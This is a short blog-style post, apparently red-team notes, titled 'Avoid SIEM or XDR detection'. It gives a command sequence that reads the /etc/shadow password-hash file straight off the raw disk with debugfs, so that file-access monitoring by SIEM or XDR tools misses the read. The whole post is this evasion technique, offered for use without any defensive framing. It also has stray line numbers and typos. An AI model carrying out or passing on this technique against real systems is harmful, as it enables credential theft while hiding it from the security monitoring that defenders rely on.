Avoid SIEM or XDR detection
Avoid SIEM or XDR detection
red from raw disk
Your useraccount still needes accessrights to this file
1
2
3
4
5
6
7
8
# find disk name
df /
# open file on disk
debugfs
open /dev/sda2
cd /etc
cat shadow
Reference[^1]
This post is licensed under CC BY 4.0 by the author.